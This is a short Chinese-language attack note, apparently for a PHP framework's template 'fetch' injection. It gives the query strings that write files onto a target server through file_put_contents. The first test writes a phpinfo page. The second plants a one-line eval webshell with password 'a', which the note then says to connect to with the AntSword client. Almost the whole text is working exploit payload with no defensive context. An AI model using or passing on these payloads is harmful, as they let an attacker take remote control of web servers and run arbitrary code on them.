在连接后面写入一个一句话木马
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
//生成test.php 文件内容为 <?php phpinfo(); ?>
当我们访问 /test.php 执行<?php phpinfo(); ?> 输出phpinfo()
创建自己的webshell
1.<?php @eval($_POST[a]);?>
在服务器上写入webshell
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘t.php’,’<?php @eval($_POST[a]);?>’)
密码为a
t.php 文件内容为 <?php @eval($_POST[a]);?>
连接蚁剑
webshell(一句话)地址